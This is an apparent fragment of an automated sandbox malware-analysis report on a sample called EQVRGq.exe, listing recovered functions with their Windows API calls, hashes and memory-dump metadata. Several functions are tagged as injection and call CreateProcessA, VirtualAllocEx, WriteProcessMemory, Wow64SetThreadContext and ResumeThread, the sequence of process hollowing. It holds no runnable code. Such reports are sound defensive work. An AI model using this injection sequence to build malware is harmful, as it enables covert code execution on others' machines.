GetCurrentThread.KERNEL32 ref: 00C0D05B
GetCurrentProcess.KERNEL32 ref: 00C0D098
GetCurrentThreadId.KERNEL32 ref: 00C0D0F1

Memory Dump Source

Source File: 00000009.00000002.1782337609.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c00000_EQVRGq.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 1c519c07eee4955d562075080d0f75b74976dcfcef0f4a6cf080e3c93815d1ab
Instruction ID: 3fa6424e34c5658065e6d0b404e3fc5713668b6bf3ebc11bd66e1e9501ffd629
Opcode Fuzzy Hash: 1c519c07eee4955d562075080d0f75b74976dcfcef0f4a6cf080e3c93815d1ab
Instruction Fuzzy Hash: 075166B0D003498FDB14DFAAD548BEEBBF1AF88314F20C469E419A72A0D7749985CF65

Function 00C0CFA0 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00C0D01E
GetCurrentThread.KERNEL32 ref: 00C0D05B
GetCurrentProcess.KERNEL32 ref: 00C0D098
GetCurrentThreadId.KERNEL32 ref: 00C0D0F1

Memory Dump Source

Source File: 00000009.00000002.1782337609.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c00000_EQVRGq.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: f1376d790af5561e7b71b1cc77a57ca855d0d7f5c54ef342ae14d60ecf802b84
Instruction ID: 08b049131a278b9416aecf0f4a9034504db7fd2e9cb70223fd2a950526e5dc91
Opcode Fuzzy Hash: f1376d790af5561e7b71b1cc77a57ca855d0d7f5c54ef342ae14d60ecf802b84
Instruction Fuzzy Hash: F55146B09003498FDB14DFAAD548BEEBBF1AF88314F20C459E419A72A0D774A984CF65

Function 06C17F69 Relevance: 1.7, APIs: 1, Instructions: 244
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06C181A6

Memory Dump Source

Source File: 00000009.00000002.1789147261.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6c10000_EQVRGq.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 73e06e8d64436b77db30d6c208e08094d898baf002648f97fc0303e2c977a761
Instruction ID: 187e6e754977214787fc8f1a247b0adc82bca830e14d43e0879ece78d528b6a1
Opcode Fuzzy Hash: 73e06e8d64436b77db30d6c208e08094d898baf002648f97fc0303e2c977a761
Instruction Fuzzy Hash: 35919C71D05659CFDF60CFA8C8407EEBBB2BF49310F1485A9E848AB240DB749A85DF91

Function 06C17F70 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06C181A6

Memory Dump Source

Source File: 00000009.00000002.1789147261.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6c10000_EQVRGq.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: fd067b266fc129ad379950327f12e4a2990242edbae6e89ff8d3b47749eb7b20
Instruction ID: 452653e058ee647a2e547e49fb212013ca0908197c201a54cad328dc58312fcf
Opcode Fuzzy Hash: fd067b266fc129ad379950327f12e4a2990242edbae6e89ff8d3b47749eb7b20
Instruction Fuzzy Hash: B4918C71D05659CFDF50CFA8C8407EEBBB2BF49310F1485A9E848AB240DB749A85DF91

Function 00C0AD08 Relevance: 1.7, APIs: 1, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00C0AF5E

Memory Dump Source

Source File: 00000009.00000002.1782337609.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c00000_EQVRGq.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 6dc632d6725bd277fcba800f97b18f510caca9d5f7810ca0214328827bd0a7b1
Instruction ID: cfa4eb73b7ab258068adb449e73a442b57df07c31e0431d80028383c44bb0f46
Opcode Fuzzy Hash: 6dc632d6725bd277fcba800f97b18f510caca9d5f7810ca0214328827bd0a7b1
Instruction Fuzzy Hash: BB714570A00B058FDB24DF2AC44175ABBF5FF88304F108A2DD49AD7A90DB75E949CB91

Function 00C044B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00C059A9

Memory Dump Source

Source File: 00000009.00000002.1782337609.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c00000_EQVRGq.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 8cc3664c414dd86e9691feb3f8bc6569c211a7d5ae307065729890c87c431db4
Instruction ID: 54aa0810a44fd2a0b0669e99d90be64765cb165421f438d5b64071e85c536b45
Opcode Fuzzy Hash: 8cc3664c414dd86e9691feb3f8bc6569c211a7d5ae307065729890c87c431db4
Instruction Fuzzy Hash: B14112B0C00719CFDB24DFAAC844B9EBBF5BF89304F20816AD418AB291DB756945CF90

Function 00C058EC Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00C059A9

Memory Dump Source

Source File: 00000009.00000002.1782337609.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c00000_EQVRGq.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 1e72818047369390b19d5a6a1db5da6bc2f24f2edcd5d6e8df7b7e07deb73e64
Instruction ID: 6797257bf63db42ec32ef3fa9975078e53ab198b99900918cdee7818348a3845
Opcode Fuzzy Hash: 1e72818047369390b19d5a6a1db5da6bc2f24f2edcd5d6e8df7b7e07deb73e64
Instruction Fuzzy Hash: EB4123B0D00719CFDB24CFA9C8447DEBBB5BF88304F24806AD418AB295DB755946CF90

Function 06C17CE0 Relevance: 1.6, APIs: 1, Instructions: 71
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06C17D78

Memory Dump Source

Source File: 00000009.00000002.1789147261.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6c10000_EQVRGq.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: d6ca68833b92ed3d4cd5d7a793251a7929ba63144bea19c8882b868860dacea0
Instruction ID: ca013a67896b2695768c08df737f9258e3954931b889ba9099801802f54d8a35
Opcode Fuzzy Hash: d6ca68833b92ed3d4cd5d7a793251a7929ba63144bea19c8882b868860dacea0
Instruction Fuzzy Hash: 642148B19003599FCB10DFA9C885BEEBBF5FF88310F108429E959A7250C7789954CBA5

Function 06C17CE8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06C17D78

Memory Dump Source

Source File: 00000009.00000002.1789147261.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6c10000_EQVRGq.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 7d1127ab32ca2e787afbccbd59ac17611a4ef800f3cd3832dbe1b25b7007b014
Instruction ID: 40105441e395fd88781a0fe67bf7090e9d4ce61d85c66cb749b02b2f110e9850
Opcode Fuzzy Hash: 7d1127ab32ca2e787afbccbd59ac17611a4ef800f3cd3832dbe1b25b7007b014
Instruction Fuzzy Hash: 832157B190035D9FCB10DFA9C884BEEBBF5FF88310F108429E919A7250C7789954CBA4

Function 06C17B48 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C17BCE

Memory Dump Source

Source File: 00000009.00000002.1789147261.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6c10000_EQVRGq.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 91d20597ac8449fc80a41b1d81f121c7fb00feef2c17f87e361930cce7949fae
Instruction ID: 76e9d875c0267cd1eb2f6f9a189140ed8ec4efe2baceaace940575b820392c24
Opcode Fuzzy Hash: 91d20597ac8449fc80a41b1d81f121c7fb00feef2c17f87e361930cce7949fae
Instruction Fuzzy Hash: 24213AB1D002099FDB10DFAAC485BEEBBF4EF89314F14842AD459A7240CB789985CFA5

Function 06C17DD0 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06C17E58

Memory Dump Source

Source File: 00000009.00000002.1789147261.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6c10000_EQVRGq.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 360cd76c23efeff0c5c5f68a62a3464a86558966a1c1aaaebbe2f095a91e6dbb
Instruction ID: 3c1b7cf93402ee51e3614cbfa405d27ac721da7373b85501638689b55da22307
Opcode Fuzzy Hash: 360cd76c23efeff0c5c5f68a62a3464a86558966a1c1aaaebbe2f095a91e6dbb
Instruction Fuzzy Hash: BC2139B18003599FCB10DF9AC844AEEFBF5FF48310F10842AE959A7250C7349944CBA4

Function 00C0D5E9 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C0D677

Memory Dump Source

Source File: 00000009.00000002.1782337609.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c00000_EQVRGq.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 354ee24cfea1aec54b816084268b61f0d42e8c46b262b7ffc21ac75f11a92fff
Instruction ID: 35ef7333a99ee80849cb0c710b2bf9f6fef40d45c9ae32e37407ad84f72f19e6
Opcode Fuzzy Hash: 354ee24cfea1aec54b816084268b61f0d42e8c46b262b7ffc21ac75f11a92fff
Instruction Fuzzy Hash: 3A21E4B5900258DFDB10CFAAD584ADEBFF5EB48310F14842AE918A7350C375A944CFA4

Function 06C17DD8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06C17E58

Memory Dump Source

Source File: 00000009.00000002.1789147261.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6c10000_EQVRGq.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: fd5c1851dd0c79fb5e227af5e42a2247c16e71d4c3b6b2e8dc557e16323467d0
Instruction ID: 9c992f24c78b0317b32e793c301bdfe3c12e36752a706bd3d6da19f9d35f233b
Opcode Fuzzy Hash: fd5c1851dd0c79fb5e227af5e42a2247c16e71d4c3b6b2e8dc557e16323467d0
Instruction Fuzzy Hash: 802128B18003599FCB10DFAAC844ADEFBF5FF48310F108429E558A7250C7349944DBA4

Function 06C17B50 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06C17BCE

Memory Dump Source

Source File: 00000009.00000002.1789147261.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6c10000_EQVRGq.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c9ed7808983b320990ad1f8341643b5c49c98db6178c0e6d217a7d963570cdd7
Instruction ID: ce0bb1cf7ae6c5a7875d2d0933fec10e1325e3d547d1a0a1caece06c8a59e082
Opcode Fuzzy Hash: c9ed7808983b320990ad1f8341643b5c49c98db6178c0e6d217a7d963570cdd7
Instruction Fuzzy Hash: F42118B1D002098FDB10DFAAC4857EEBBF4EF89324F14842AD459A7240CB78A945CFA5

Function 00C0D5F0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C0D677

Memory Dump Source

Source File: 00000009.00000002.1782337609.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c00000_EQVRGq.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: e22edfae4ecd8cc67ecf11c4dc118969f3c4363489ae8b8492d62e25072df657
Instruction ID: 8205071b137bcd97004f9b683ac912d30ed0f5a56ed824bd9c5af010e7395840
Opcode Fuzzy Hash: e22edfae4ecd8cc67ecf11c4dc118969f3c4363489ae8b8492d62e25072df657
Instruction Fuzzy Hash: 4121C2B59002589FDB10CFAAD984ADEBBF8EB48320F14841AE958A7350D375A944CFA5

Function 06C17C20 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06C17C96

Memory Dump Source

Source File: 00000009.00000002.1789147261.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6c10000_EQVRGq.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e23d75b21742ffbff6ade0f950331f934b6315f4c79ec72ca1970b5d4c9af3b1
Instruction ID: cca382aee551caadfb33419a8f44349e522d5825958a9a45b7ac103ae2074376
Opcode Fuzzy Hash: e23d75b21742ffbff6ade0f950331f934b6315f4c79ec72ca1970b5d4c9af3b1
Instruction Fuzzy Hash: 481159B1800248DFCB20DFAAC845ADFBFF5EF89320F108419E959A7250C7359940DFA5

Function 06C17C28 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06C17C96

Memory Dump Source

Source File: 00000009.00000002.1789147261.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6c10000_EQVRGq.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a36495252c9c0088728a685de49748a2d326ea94ada7f5135b31deb9f86f7f37
Instruction ID: e26cc72e979df437f868bd042bbcd118f06a85ea0be5feca5665e6e4627ac449
Opcode Fuzzy Hash: a36495252c9c0088728a685de49748a2d326ea94ada7f5135b31deb9f86f7f37
Instruction Fuzzy Hash: 701137B19002499FCB10DFAAC844BDFBFF5EF88320F148419E559A7250C775A544CFA4

Function 06C17A98 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06C17B02

Memory Dump Source

Source File: 00000009.00000002.1789147261.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6c10000_EQVRGq.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 4e99c88bfd24896299c7115fecf4bf9d02a39b43023e36bfdbad1078e8e486d5
Instruction ID: 1d883c68cbedd627e1ab518b10bd0aad8687a434ae6a39e9baef48d617dba3f9
Opcode Fuzzy Hash: 4e99c88bfd24896299c7115fecf4bf9d02a39b43023e36bfdbad1078e8e486d5
Instruction Fuzzy Hash: 741128B1D002488FCB20DFAAC8457DEFFF4EB89324F248429D459A7250CB75A984CFA5

Function 06C17AA0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06C17B02

Memory Dump Source

Source File: 00000009.00000002.1789147261.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6c10000_EQVRGq.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: b79be245554156ba91ffba95635ae084833a5d60888011873b0dd556e98a1568
Instruction ID: 60ea1a775f07e5439378b095191b5d9df6a8948b63bf0ee785adaa1fee1a856d
Opcode Fuzzy Hash: b79be245554156ba91ffba95635ae084833a5d60888011873b0dd556e98a1568
Instruction Fuzzy Hash: 8B1136B1D002488FCB20DFAAC4457DEFBF4EB89324F248429D459A7250CB79A944CFA4

Function 06C1B6E8 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06C1B74D

Memory Dump Source

Source File: 00000009.00000002.1789147261.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6c10000_EQVRGq.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: e94c9ef2aa84c31bf9025666a4d8a7fbe8e50a58a19c9ce1c8ef904296b9e335
Instruction ID: a87cfe87643abb6f88fb801945025b3e53af0ea1fa9281a78c71a08c08294a22
Opcode Fuzzy Hash: e94c9ef2aa84c31bf9025666a4d8a7fbe8e50a58a19c9ce1c8ef904296b9e335
Instruction Fuzzy Hash: 9011F5B5800349DFDB10DF9AD989BDEBBF8EB49310F10841AE958A7210C375A944CFA5

Function 06C14954 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06C1B74D

Memory Dump Source

Source File: 00000009.00000002.1789147261.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6c10000_EQVRGq.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 2eaf9408fe0e091d82ca59d8df6a146e5ed930ba3bada6c211372a7fd22b01e1
Instruction ID: 8d08420f6ee36d39f7cc9ff7b7cb1c5cf80f199700df032eb9c2f7a9ed2685db
Opcode Fuzzy Hash: 2eaf9408fe0e091d82ca59d8df6a146e5ed930ba3bada6c211372a7fd22b01e1
Instruction Fuzzy Hash: 1A11F2B58003499FDB10DF9AC888BDEBBF8EB48320F10845AE958A7210C375A944CFA5

Function 00C0AEF8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00C0AF5E

Memory Dump Source

Source File: 00000009.00000002.1782337609.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_c00000_EQVRGq.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 2db2ba97de8b1f5ce1b29c1b08fe0cf9e65de914d8500b45b59a20bbd03daafa
Instruction ID: 421f3e5af2042d0f76a6f3615a45a811c48a83810076b42afdf17e4ce9b71f1b
Opcode Fuzzy Hash: 2db2ba97de8b1f5ce1b29c1b08fe0cf9e65de914d8500b45b59a20bbd03daafa
Instruction Fuzzy Hash: B011F2B5C003498FCB10DF9AC444ADEFBF4EF88324F14856AD869A7250C379A645CFA5

Function 00A7D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1781602641.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a7d000_EQVRGq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30d29bd2d1cf031917b3d28a22d74c4e947fb35df210b162272ba7a989188413
Instruction ID: 07762ee4aec9cbdb267b4059c080900b1027d7b5cefd9ddd9f88d2136d042552
Opcode Fuzzy Hash: 30d29bd2d1cf031917b3d28a22d74c4e947fb35df210b162272ba7a989188413
Instruction Fuzzy Hash: 6D210372500204EFDB05DF14DAC4B26BF75FF98324F20C569E90D4B256C336E856CAA2

Function 00A8D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1781728264.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a8d000_EQVRGq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87efc13375e9354a71a2b9f6152e675a76f9b8a3790221ac4086120649518165
Instruction ID: c009735b2b3a2b4defd49d65ef21df5be7b59cfd1d6ea76976d85d59c529a045
Opcode Fuzzy Hash: 87efc13375e9354a71a2b9f6152e675a76f9b8a3790221ac4086120649518165
Instruction Fuzzy Hash: 8D21F271604204EFDB14EF14D984B26BFB5FB84314F20C569D84A4B296C33AD847CB61

Function 00A8D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1781728264.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a8d000_EQVRGq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f5a7849b1dba08bf15f6a9a5ba62fcde59cb2a8943059b322a7d412eb94772a
Instruction ID: 441214bbe0e7c67db17f94f1aadba86a23ce823b040fd6f8f95f80f7e4156b2b
Opcode Fuzzy Hash: 6f5a7849b1dba08bf15f6a9a5ba62fcde59cb2a8943059b322a7d412eb94772a
Instruction Fuzzy Hash: 06210471504204EFDB05EF14D9C4B66BBB5FB84314F20C66DE8094B2D6D336D846CB61

Function 00A8D006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1781728264.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a8d000_EQVRGq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b713659997c6e6039201c49ae0f132c4f74bec09d3433e4f5633cf9b2cd4274
Instruction ID: 46df53e9b1ab824c79f2ffcefff6fb7648d23394e9ee400323ddeb7a2f4b7d5e
Opcode Fuzzy Hash: 7b713659997c6e6039201c49ae0f132c4f74bec09d3433e4f5633cf9b2cd4274
Instruction Fuzzy Hash: 1C2192755083809FDB02DF14D994711BF71EB56314F28C5DAD8498F2A7C33A980ACB62

Function 00A7D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1781602641.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a7d000_EQVRGq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 62417d4936cf678db72456c9e69d3dddae97bbc8acdb2ca3dbb3f0624a45ee71
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 0511D076504280DFDB16CF14D9C4B16BF72FF94324F24C6A9D9090B656C33AE85ACBA2

Function 00A8D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1781728264.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a8d000_EQVRGq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 5ca1aa3d6940522aea9652a2006bb7819b6d76c3368a18da775234ad60579d6a
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: 3E11BB75504280DFCB02DF14C5C4B55BBA1FB84314F24C6AAD8494B296C33AD81ACB61

Function 00A7D759 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1781602641.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a7d000_EQVRGq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5da5f66a0786cc42a24bac2f5eee9b0489459f4368cf835d232b45986d467ceb
Instruction ID: c45dbf665726c0b4b519c8d781c34041d8390b72a4ea922f374cd15360b10a58
Opcode Fuzzy Hash: 5da5f66a0786cc42a24bac2f5eee9b0489459f4368cf835d232b45986d467ceb
Instruction Fuzzy Hash: 1F01A2711083409EE7149B2ACD84B67BFB8EF91324F18C92AED0D4A286C379D840C6B1

Function 00A7D758 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1781602641.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_a7d000_EQVRGq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cbe92703610e63af39fbeec545ad0fe7b8ae58b146c5dc5d67a5acdaaa4feb7
Instruction ID: 1228283027665cdb31a188f93f2f4463d0025620874ea59af0ab0fef52f9edd0
Opcode Fuzzy Hash: 9cbe92703610e63af39fbeec545ad0fe7b8ae58b146c5dc5d67a5acdaaa4feb7
Instruction Fuzzy Hash: E2F062714043449EE7148B1ADC84B62FFA8EF91724F18C55AED4C4E286C3799844CAB1

Analysis Process: EQVRGq.exePID: 7856, Parent PID: 7560COMMON

Execution Graph

Execution Coverage:	13.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	29
Total number of Limit Nodes:	6

Executed Functions

Function 06A23070 Relevance: 8.0, Strings: 6, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06A23746
$^q, xrefs: 06A2377B
$^q, xrefs: 06A23752
$^q, xrefs: 06A23793
$^q, xrefs: 06A2376F
$^q, xrefs: 06A2379F

Memory Dump Source

Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: 42cc793a9c096cd4666ed1ffaaea098fb7559f95de54b67dfac20c7a6e9e97ed
Instruction ID: 134c334749fe0cb838c4004e8ab81a7e113fc8b96f71d5de3c3554df13b53517
Opcode Fuzzy Hash: 42cc793a9c096cd4666ed1ffaaea098fb7559f95de54b67dfac20c7a6e9e97ed
Instruction Fuzzy Hash: 72322E31E5061ACFDB14EF79C85459DB7B6FFCA300F20C6A9D409AB214EB34A985CB91

Function 06A27DA0 Relevance: 3.0, Strings: 2, Instructions: 470
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06A280E9
$^q, xrefs: 06A280DD

Memory Dump Source

Source File: 0000000E.00000002.4171773156.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6a20000_EQVRGq.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 977a764f18f416a8cb9476be55d2fa5486a4f1913ab85a3ae976bb366595c825
Instruction ID: dd3c0b81bed2c2c4dc2dd4806e7eb53fbe99a4f122ae5d4f285ffd81261fc00b
Opcode Fuzzy Hash: 977a764f18f416a8cb9476be55d2fa5486a4f1913ab85a3ae976bb366595c825
